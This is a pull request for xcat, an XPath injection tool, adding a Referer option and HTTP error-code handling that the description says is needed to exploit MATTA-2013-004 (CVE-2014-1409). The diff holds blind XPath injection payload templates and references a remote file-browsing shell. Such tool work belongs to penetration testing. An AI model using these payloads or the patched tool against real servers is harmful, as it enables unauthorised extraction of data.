### PR TITLE
Misc fixes for the 0.6 branch

### DIFF
--- a/src/lib/payloads.py
+++ b/src/lib/payloads.py
@@ -91,7 +91,7 @@ class PayloadMaker(object):
 
         self._headers = Headers({"User-Agent":[config.user_agent], "Referer":[config.referer], "Content-Type":["application/x-www-form-urlencoded"], "Cookie":[config.cookie]})
 
-        if config.error_keyword:
+        if config.error_keyword or config.error_code:
             self.BASE = string.Template("' and (if ($payload) then error() else 0) and '1' = '1".replace("'", config.quote_character))
         else:
             self.BASE = string.Template("' and $payload and '1'='1".replace("'", config.quote_character))

--- a/src/lib/payloads.py
+++ b/src/lib/payloads.py
@@ -89,7 +89,7 @@ class PayloadMaker(object):
         self.search_space = string.ascii_letters + string.digits + " .-"
         self.agent = Agent(reactor)
 
-        self._headers = Headers({"User-Agent":[config.user_agent], "Content-Type":["application/x-www-form-urlencoded"], "Cookie":[config.cookie]})
+        self._headers = Headers({"User-Agent":[config.user_agent], "Referer":[config.referer], "Content-Type":["application/x-www-form-urlencoded"], "Cookie":[config.cookie]})
 
         if config.error_keyword:
             self.BASE = string.Template("' and (if ($payload) then error() else 0) and '1' = '1".replace("'", config.quote_character))

--- a/src/xcat.py
+++ b/src/xcat.py
@@ -433,6 +433,7 @@ if __name__ == "__main__":
     parser.add_argument("--fileshell", help="Launch a shell for browing remote files", action="store_true", dest="fileshell")
     parser.add_argument("--getcwd", help="Retrieve the XML documents URI that the server is executing our query against", action="store_true", dest="getcwd")
     parser.add_argument("--useragent", help="User agent to use", action="store", dest="user_agent", default="XCat %s"%__VERSION__)
+    parser.add_argument("--referer", help="Referer to use", action="store", dest="referer", default="/")
     parser.add_argument("--cookie", help="Cookie to use", action="store", dest="cookie")
     parser.add_argument("--timeit", help="Time the retrieval", action="store_true", dest="timeit", default=False)
     parser.add_argument("--ignorecomments", help="Don't extract document comments", action="store_true", dest="ignore_comments", default=False)

--- a/src/xcat.py
+++ b/src/xcat.py
@@ -445,8 +445,8 @@ if __name__ == "__main__":
 
     sys.stderr.write("XCat version %s\n"%__VERSION__)
 
-    if not any([args.false_keyword, args.true_keyword, args.error_keyword]):
-        sys.stderr.write("Error: You must supply a false, true or error keyword\n")
+    if not any([args.false_keyword, args.true_keyword, args.error_keyword, args.true_code, args.fail_code, args.error_code]):
+        sys.stderr.write("Error: You must supply a false, true or error keyword/code\n")
         exit()
 
     if not args.post_argument:


### PR DESCRIPTION
Here's a small set of patch required to exploit MATTA-2013-004 (CVE-2014-1409) using xcat 0.6.

Might be worth merging if you ever do a maintainance release; I've not checked whether the HTTP-error code handling has been fixed in recent versions
